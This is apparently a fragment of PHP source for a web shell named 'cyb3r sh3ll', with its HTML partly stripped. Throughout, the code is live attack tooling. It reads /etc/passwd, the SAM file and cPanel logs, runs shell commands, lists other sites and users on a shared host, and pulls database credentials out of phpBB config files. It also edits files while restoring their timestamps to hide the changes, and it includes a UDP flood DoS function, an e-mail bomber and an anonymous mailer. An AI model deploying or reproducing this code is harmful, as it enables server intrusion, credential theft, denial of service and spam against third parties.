    ";} + + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
    ";} + } + + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + + if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} + + if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} + + if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} + + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} + + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + + displaysecinfo("RAM",myshellexec("free -m")); + + displaysecinfo("HDD space",myshellexec("df -h")); + + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + + displaysecinfo("Is links installed?",myshellexec("which links")); + + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + + displaysecinfo("Is GET installed?",myshellexec("which GET")); + + displaysecinfo("Is perl installed?",myshellexec("which perl")); + + displaysecinfo("Where is apache",myshellexec("whereis apache")); + + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); + +} + +if ($act == "mkfile") + +{ + if ($mkfile != $d) + + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + + } + else {$act = $dspact = "ls";} + +} + +if ($act == "encoder") + +{ + echo "
    Encoder:
    Input:




    Hashes:
    "; + + foreach(array("md5","crypt","sha1","crc32") as $v) + + { + echo $v." -
    "; + } + + echo "
    Url:

    urlencode - + +
    urldecode - + +
    Base64:
    base64_encode -
    "; + + echo "
    base64_decode - "; + + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + + else + + { + + $debase64 = base64_decode($encoder_input); + + $debase64 = str_replace("\0","[0]",$debase64); + + $a = explode("\r\n",$debase64); + + $rows = count($a); + + $debase64 = htmlspecialchars($debase64); + + if ($rows == 1) {echo "";} + + else {$rows++; echo "";} + + echo " ^"; + + } + + echo "

    Base convertations:
    dec2hex -
    "; + +} + +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + + { + + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using cyb3r sh3ll v.".$shver."!"; cyb3rexit(); } + + else {echo "
    Can't delete ".__FILE__."!
    ";} + + } + + else + + { + + if (!empty($rndcode)) {echo "Error: Incorrect Confimation!";} + + $rnd = rand(0,9).rand(0,9).rand(0,9); + + echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; + + } + +} + +if ($act == "serverinfo") +{ + +global $windows,$disablefunctions,$safemode; +$cwd= getcwd(); +$mil="$osn",$os); +$os = str_replace($ker,"${mil}Linux+Kernel\">$ker",$os); +$inpa=':'; +}else{ +$sam = $sysroot."\\system32\\config\\SAM"; +$inpa=';'; +$os = str_replace($osn,"${mil}MS+Windows\">$osn",$os); +} +$software=str_replace("Apache","${mil}Apache\">Apache",$_SERVER['SERVER_SOFTWARE']); +echo " + + + + + + + + + +"; +if ($windows){ +echo " + +"; +} +else +{ +echo ""; +} +$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR'); +echo " + + + + + + + + + + + +";if (function_exists('curl_init')) echo "";echo "
    Server information:
    Server:".$_SERVER["HTTP_HOST"]; +if (!empty($_SERVER["SERVER_ADDR"])){ + echo "(". $_SERVER["SERVER_ADDR"] .")";} +echo " +
    Operation System: $os$osver
    Web server Application: $software
    CPU: $CPU
    Disk status:$disksize
    User domain:"; +if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN']; +else echo "Unknown"; +echo " +
    User Name :";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user(); +else echo "Unknown"; echo "
    Windows directory:$sysroot
    Sam file:"; +if (is_readable(($sam)))echo " +Readable"; else echo "Not readable";echo "
    Passwd file:"; +if (is_readable('/etc/passwd')) echo " +Readable"; else echo'Not readable';echo "
    Cpanel log file:"; +if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "Readable"; else echo "Not readable";}else echo "Not found"; +echo "
    ${mil}PHP\">PHP version:".PHP_VERSION." +(more...)
    Zend version:";if (function_exists('zend_version')) echo "".zend_version().""; +else echo "Not Found";echo "
    Include path:".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."
    PHP Modules:";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." "; +echo "
    Disabled functions:"; +if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"
    Safe mode:$sfmode
    Open base dir:$basedir
    DBMS:";$sq=""; +if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL "; +if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL "; +if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle "; +if(function_exists('sqlite_open')) $sq.= " SQLite "; +if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL "; +if(function_exists('msql_connect')) $sq.= " mSQL "; +if(function_exists('mysqli_connect'))$sq.= " MySQLi "; +if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL "; +if ($sq=="") $sq= "Nothing"; + +echo "$sq
    cURL support:Enabled "; +if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "
    "; + +} + +if ($act == "clientinfo") +{ +echo "
    User information:
    IP:".$_SERVER['REMOTE_ADDR']."
    Agent:".getenv('HTTP_USER_AGENT')."
    "; +} + +if ($act == "processes") + +{ + + echo "Processes:
    "; + + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + + else {$handler = "tasklist";} + + $ret = myshellexec($handler); + + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + + else + + { + + if (empty($processes_sort)) {$processes_sort = $sort_default;} + + $parsesort = parsesort($processes_sort); + + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + + $k = $parsesort[0]; + + if ($parsesort[1] != "a") {$y = "";} + + else {$y = "";} + + $ret = htmlspecialchars($ret); + + if (!$win) + + { + + if ($pid) + + { + + if (is_null($sig)) {$sig = 9;} + + echo "Sending signal ".$sig." to #".$pid."... "; + + if (posix_kill($pid,$sig)) {echo "OK.";} + + else {echo "ERROR.";} + + } + + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + + $stack = explode("\n",$ret); + + $head = explode(" ",$stack[0]); + + unset($stack[0]); + + for($i=0;$i".$head[$i]."";} + + } + + $prcs = array(); + + foreach ($stack as $line) + + { + + if (!empty($line)) + +{ + + echo "
    "; + + foreach($tab as $i=>$k) + + { + + echo ""; + + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + + echo ""; + + } + + echo "
    ".$v."
    "; + + } + +} + +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + + $list = array(); + + if ($h = @opendir($d)) + + { + + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + + closedir($h); + + } + + else {} + + } + + if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
    ";} + else + { + + //Building array + + $objects = array(); + + $vd = "f"; //Viewing mode + + if ($vd == "f") + + { + + $objects["head"] = array(); + + $objects["folders"] = array(); + + $objects["links"] = array(); + + $objects["files"] = array(); + + foreach ($list as $v) + + { + + $o = basename($v); + + $row = array(); + + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + + elseif (is_dir($v)) + + { + + if (is_link($v)) {$type = "LINK";} + + else {$type = "DIR";} + + $row[] = $v; + + $row[] = $type; + + } + + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + + $row[] = filemtime($v); + + if (!$win) + + { + + $ow = posix_getpwuid(fileowner($v)); + + $gr = posix_getgrgid(filegroup($v)); + + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + + } + + $row[] = fileperms($v); + + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + + elseif (is_link($v)) {$objects["links"][] = $row;} + + elseif (is_dir($v)) {$objects["folders"][] = $row;} + + elseif (is_file($v)) {$objects["files"][] = $row;} + + $i++; + + } + + $row = array(); + + $row[] = "Name"; + + $row[] = "Size"; + + $row[] = "Modify"; + + if (!$win) + + {$row[] = "Owner/Group";} + + $row[] = "Perms"; + + $row[] = "Action"; + + $parsesort = parsesort($sort); + + $sort = $parsesort[0].$parsesort[1]; + + $k = $parsesort[0]; + + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + + $y = ""; + + $y .= "\"".($parsesort[1]"; + + $row[$k] .= $y; + + for($i=0;$i".$row[$i]."";} + + } + + $v = $parsesort[0]; + + usort($objects["folders"], "tabsort"); + + usort($objects["links"], "tabsort"); + + usort($objects["files"], "tabsort"); + + if ($parsesort[1] == "d") + + { + + $objects["folders"] = array_reverse($objects["folders"]); + + $objects["files"] = array_reverse($objects["files"]); + + } + + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + + $tab = array(); + + $tab["cols"] = array($row); + + $tab["head"] = array(); + + $tab["folders"] = array(); + + $tab["links"] = array(); + + $tab["files"] = array(); + + $i = 0; + + foreach ($objects as $a) + + { + + $v = $a[0]; + + $o = basename($v); + + $dir = dirname($v); + + if ($disp_fullpath) {$disppath = $v;} + + else {$disppath = $o;} + + $disppath = str2mini($disppath,60); + + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + + foreach ($regxp_highlight as $r) + + { + + if (ereg($r[0],$o)) + + { + + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; cyb3rexit();} + + else + + { + + $r[1] = round($r[1]); + + $isdir = is_dir($v); + + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + + { + + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + + $disppath = $r[2].$disppath.$r[3]; + + if ($r[4]) {break;} + + } + + } + + } + + } + + $uo = urlencode($o); + + $ud = urlencode($dir); + + $uv = urlencode($v); + + $row = array(); + + if ($o == ".") + + { + + $row[] = " ".$o.""; + + $row[] = "LINK"; + + } + + elseif ($o == "..") + + { + + $row[] = " ".$o.""; + + $row[] = "LINK"; + + } + + elseif (is_dir($v)) + + { + + if (is_link($v)) + + { + + $disppath .= " => ".readlink($v); + + $type = "LINK"; + + $row[] = " [".$disppath."]"; + + } + + else + + { + + $type = "DIR"; + + $row[] = " [".$disppath."]"; + + } + + $row[] = $type; + + } + + elseif(is_file($v)) + + { + + $ext = explode(".",$o); + + $c = count($ext)-1; + + $ext = $ext[$c]; + + $ext = strtolower($ext); + + $row[] = " ".$disppath.""; + + $row[] = view_size($a[1]); + + } + + $row[] = date("d.m.Y H:i:s",$a[2]); + + if (!$win) {$row[] = $a[3];} + + $row[] = "".view_perms_color($v).""; + + if ($o == ".") {$checkbox = ""; $i--;} + + else {$checkbox = "";} + + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + + else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;} + + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + + elseif (is_link($v)) {$tab["links"][] = $row;} + + elseif (is_dir($v)) {$tab["folders"][] = $row;} + + elseif (is_file($v)) {$tab["files"][] = $row;} + + $i++; + + } + + } + + // Compiling table + + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + + echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    "; + + foreach($table as $row) + + { + + echo "\r\n"; + + foreach($row as $v) {echo "\r\n";} + + echo "\r\n"; + + } + + echo "
    ".$v."


    + + + +    + + "; + + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + + { + + echo "                   "; + + } + + echo " 

    "; + + echo "
    "; + } + ?> + + + + + + + + + + + + + + + + + + +

    :: PHP Safe Mode Bypass ::

    :: Make File/Directory ::

    :: Go File/Directory ::

    + +
    (: List Directories :)
    + +

    + + Dir:

    eg: /etc/
    +$chemin
    "; + +foreach ($files as $filename) { + + echo "
    ";
    +
    +   echo "$filename\n";
    +
    +   echo "
    "; + +} + +} + + + +if(isset($_GET['directory'])) + +{ + +rsg_glob(); + +} + + + +?> + + +
    + +
    +
    [: Make Directory :]
     
    +
    +
    {: Go Directory :}
     
    +
    + +
    (: Read Files :)

    + +
    + +
    File:

    eg: /etc/passwd
    + Trying To Get File $get
    "; + + if(copy("compress.zlib://".$file, $temp)){ + + $fichier = fopen($temp, "r"); + + $action = fread($fichier, filesize($temp)); + + fclose($fichier); + + $source=htmlspecialchars($action); + + echo "
    Start $get

    $source

    Fin $get
    "; + + unlink($temp); + + } else { + + die("
    Sorry... File + + ".htmlspecialchars($file)." dosen't exists or you don't have + + access.
    "); + + } + + echo "
    "; + + } + + + + if(isset($_GET['file'])) + +{ + +rsg_read(); + +} + + + + ?> + + +
    + +
    + +
    + +
    +
    [: Make File :]
     
    +
    +
    {: Go File :}
     
    +
    ";} + + } + + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + + $act = "ls"; + +} + +if ($act == "chmod") + +{ + + $mode = fileperms($d.$f); + + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + + else + + { + + $form = TRUE; + + if ($chmod_submit) + + { + + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + + else {$err = "Can't chmod to ".$octet.".";} + + } + + if ($form) + + { + + $perms = parse_perms($mode); + + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + + } + + } + +} + +if ($act == "search") + +{ + + echo "Search in file-system:
    "; + + if (empty($search_in)) {$search_in = $d;} + + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + + if (!empty($submit)) + + { + + $found = array(); + + $found_d = 0; + + $found_f = 0; + + $search_i_f = 0; + + $search_i_d = 0; + + $a = array + + ( + + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + + "text_wwo"=>$search_text_wwo, + + "text_cs"=>$search_text_cs, + + "text_not"=>$search_text_not + + ); + + $searchtime = getmicrotime(); + + $in = array_unique(explode(";",$search_in)); + + foreach($in as $v) {cyb3rfsearch($v);} + + $searchtime = round(getmicrotime()-$searchtime,4); + + if (count($found) == 0) {echo "No files found!";} + + else + + { + + $ls_arr = $found; + + $disp_fullpath = TRUE; + + $act = "ls"; + + } + + } + + echo "
    + + + +Search for (file/folder name):   - regexp + +
    Search in (explode \";\"): + +

    Text:
    + +

    - regexp + +   - whole words only + +   - case sensitive + +   - find files NOT containing the text + +

    "; + + if ($act == "ls") {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} + +} + +if ($act == "fsbuff") + +{ + + $arr_copy = $sess_data["copy"]; + + $arr_cut = $sess_data["cut"]; + + $arr = array_merge($arr_copy,$arr_cut); + + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} + +} + +if ($act == "d") + +{ + + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + + else + + { + + echo "Directory information:"; + + if (!$win) + + { + + echo "
    Owner/Group "; + + $ow = posix_getpwuid(fileowner($d)); + + $gr = posix_getgrgid(filegroup($d)); + + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + + } + + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + + } + +} + +if ($act == "chmod") + +{ + + $mode = fileperms($d.$f); + + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + + else + + { + + $form = TRUE; + + if ($chmod_submit) + + { + + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + + else {$err = "Can't chmod to ".$octet.".";} + + } + + if ($form) + + { + + $perms = parse_perms($mode); + + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + + } + + } + +} + +if ($act == "f") + +{ + + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + + { + + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + + } + + else + + { + + $r = @file_get_contents($d.$f); + + $ext = explode(".",$f); + + $c = count($ext)-1; + + $ext = $ext[$c]; + + $ext = strtolower($ext); + + $rft = ""; + + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + + if (empty($ft)) {$ft = $rft;} + + $arr = array( + + array("","info"), + + array("","html"), + + array("","txt"), + + array("Code","code"), + + array("Session","phpsess"), + + array("","exe"), + + array("SDB","sdb"), + + array("","img"), + + array("","ini"), + + array("","download"), + + array("","notepad"), + + array("","edit") + + ); + + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + + foreach($arr as $t) + + { + + if ($t[1] == $rft) {echo " ".$t[0]."";} + + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + + else {echo " ".$t[0]."";} + + echo " (+) |"; + + } + + echo "
    "; + + if ($ft == "info") + + { + + echo "Information:"; + + if (!$win) + + { + + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + + $ow = posix_getpwuid(fileowner($d.$f)); + + $gr = posix_getgrgid(filegroup($d.$f)); + + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + + } + + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + + $fi = fopen($d.$f,"rb"); + + if ($fi) + + { + + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + + $n = 0; + + $a0 = "00000000
    "; + + $a1 = ""; + + $a2 = ""; + + for ($i=0; $i";} + + $a1 .= "
    "; + + $a2 .= "
    "; + + } + + } + + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + + echo "
    ".$a0."".$a1."".$a2."

    "; + + } + + $encoded = ""; + + if ($base64 == 1) + + { + + echo "Base64 Encode
    "; + + $encoded = base64_encode(file_get_contents($d.$f)); + + } + + elseif($base64 == 2) + + { + + echo "Base64 Encode + Chunk
    "; + + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + + } + + elseif($base64 == 3) + + { + + echo "Base64 Encode + Chunk + Quotes
    "; + + $encoded = base64_encode(file_get_contents($d.$f)); + + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + + } + + elseif($base64 == 4) + + { + + $text = file_get_contents($d.$f); + + $encoded = base64_decode($text); + + echo "Base64 Decode"; + + if (base64_encode($encoded) != $text) {echo " (failed)";} + + echo "
    "; + + } + + if (!empty($encoded)) + + { + + echo "

    "; + + } + + echo "HEXDUMP: [Full] [Preview]
    Base64: + +
    [Encode + +[+chunk + +[+chunk+quotes + +[Decode + +

    "; + + } + + elseif ($ft == "html") + + { + + if ($white) {@ob_clean();} + + echo $r; + + if ($white) {cyb3rexit();} + + } + + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
    ";} + + elseif ($ft == "phpsess") + + { + + echo "
    ";
    +
    +   $v = explode("|",$r);
    +
    +   echo $v[0]."
    "; + + var_dump(unserialize($v[1])); + + echo "
    "; + + } + + elseif ($ft == "exe") + + { + + $ext = explode(".",$f); + + $c = count($ext)-1; + + $ext = $ext[$c]; + + $ext = strtolower($ext); + + $rft = ""; + + foreach($exeftypes as $k=>$v) + + { + + if (in_array($ext,$v)) {$rft = $k; break;} + + } + + $cmd = str_replace("%f%",$f,$rft); + + echo "Execute file:

    Display in text-area
    "; + + } + + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + + elseif ($ft == "code") + + { + + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + + { + + $arr = explode("\n",$r); + + if (count($arr == 18)) + + { + + include($d.$f); + + echo "phpBB configuration is detected in this file!
    "; + + if ($dbms == "mysql4") {$dbms = "mysql";} + + if ($dbms == "mysql") {echo "Connect to DB

    ";} + + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by cyb3rell. Please, report us for fix.";} + + echo "Parameters for manual connect:
    "; + + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + + echo "

    "; + + } + + } + + echo "
    "; + + if (!empty($white)) {@ob_clean();} + + highlight_file($d.$f); + + if (!empty($white)) {cyb3rexit();} + + echo "
    "; + + } + + elseif ($ft == "download") + + { + + @ob_clean(); + + header("Content-type: application/octet-stream"); + + header("Content-length: ".filesize($d.$f)); + + header("Content-disposition: attachment; filename=\"".$f."\";"); + + echo $r; + + exit; + + } + + elseif ($ft == "notepad") + + { + + @ob_clean(); + + header("Content-type: text/plain"); + + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + + echo($r); + + exit; + + } + + elseif ($ft == "img") + + { + + $inf = getimagesize($d.$f); + + if (!$white) + + { + + if (empty($imgsize)) {$imgsize = 20;} + + $width = $inf[0]/100*$imgsize; + + $height = $inf[1]/100*$imgsize; + + echo "
    Size: "; + + $sizes = array("100","50","20"); + + foreach ($sizes as $v) + + { + + echo ""; + + if ($imgsize != $v ) {echo $v;} + + else {echo "".$v."";} + + echo "   "; + + } + + echo "

    "; + + } + + else + + { + + @ob_clean(); + + $ext = explode($f,"."); + + $ext = $ext[count($ext)-1]; + + header("Content-type: ".$inf["mime"]); + + readfile($d.$f); + + exit; + + } + + } + + elseif ($ft == "edit") + + { + + if (!empty($submit)) + + { + + if ($filestealth) {$stat = stat($d.$f);} + + $fp = fopen($d.$f,"w"); + + if (!$fp) {echo "Can't write to file!";} + + else + + { + + echo "Saved!"; + + fwrite($fp,$edit_text); + + fclose($fp); + + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + + $r = $edit_text; + + } + + } + + $rows = count(explode("\r\n",$r)); + + if ($rows < 10) {$rows = 10;} + + if ($rows > 30) {$rows = 30;} + + echo "
      
    "; + + } + + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + + } + +} + +if ($act == "about") +{ +echo '
    Script:
    -=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
    +Name: cyb3r sh3ll
    Version: '.$shver.'


    Author:
    -=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
    +Name: cyb3r 9l4d!470r (Cyber Gladiator)
    Country: India
    Website: ????...
    Email: cyb3r.gladiat0r@gmail.com +

    Greetings:
    -=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
    r45c4l bro you are my source of inspiration.
    r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot and they know for whom i\'m speaking.
    Thanks all who report bugs and send to my email id.

    '; +} + +if ($act == "dos") +{ +?>



    +Server IP:

    +Your IP:  (Don't DoS yourself nub)

    +
    +IP: + +    Time: + +    Port: + +

    + +

    +
    After initiating the DoS attack, please wait while the browser loads.
    alert('Dos Completed!');"; +print "Flooded: $ip on port $rand

    "; +$max_time = $time+$exec_time; + + + +for($i=0;$i<65535;$i++){ + $out .= "X"; +} +while(1){ +$packets++; + if(time() > $max_time){ + break; + } + + $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); + if($fp){ + fwrite($fp, $out); + fclose($fp); + } +} +echo "Packet complete at ". time() ." with $packets (" . round(($packets*65)/1024, 2) . " kB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; +} + +if ($act == "localdomain") +{ +echo "
    Sites on this server. | List of Users.

    "; +} + + if ($act == "local") + { + //radable public_html + $file = @implode(@file("/etc/named.conf")); + if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); } + preg_match_all("#named/(.*?).db#",$file ,$r); + $domains = array_unique($r[1]); + + function check() + { + (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; + } + + check(); + + echo " + + "; + + foreach($domains as $domain) + { + $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain)); + echo ""; + } + + echo "
    [+] Here : [ ".count($domains)." ] Domain ...
    List of DomainsList of Users
    $domain".$user['name']."
    "; +//radable public_html + } + + if ($act == "readable") + { + //entries in passwd file +($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('Error: safe_mode = on'); +set_time_limit(0); +################### +@$passwd = fopen('/etc/passwd','r'); +if (!$passwd) { die('[-] Error : coudn`t read /etc/passwd'); } +$pub = array(); +$users = array(); +$conf = array(); +$i = 0; +while(!feof($passwd)) +{ +$str = fgets($passwd); +if ($i > 35) +{ +$pos = strpos($str,':'); +$username = substr($str,0,$pos); +$dirz = '/home/'.$username.'/public_html/'; +if (($username != '')) +{ +if (is_readable($dirz)) +{ +array_push($users,$username); +array_push($pub,$dirz); +} +} +} +$i++; +} +################### +echo '



    Coded by cyb3r 9l4d!470r Homepage'; + + + } + + + if ($act == "mailer") + { + ?> + + + + + + + + + + + + + + +

    (: E-Mail Bomber :)

    [: Mass Mailer :]

    {: Anonymous Mailer :}

    + Some Error Occured!"; + break; + } + } + if($error != 1) + { echo "Mail(s) Sent!"; } + } + else + { + ?> +
    "> + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + To + + +
    + Subject + + +
    + No. of Times + + +
    + + Pad your message (Less spam detection) + + + + + +
    + + + +
    +
    + + +
    + Mail Sent!"; + } + else + { + echo "Some Error Occured!"; + } + } + else + { + ?> +
    "> + + + + + + + + + + + + + + + + + + + + + + + + + +
    + From + + +
    + To + + +
    + Subject + + +
    + + + +
    +
    + +
    +
    + +
    + + + + + + + + + + + + + + + + + + +
    Priority:
    + + +
     
    + +
    Content-Type:
    +
    + +
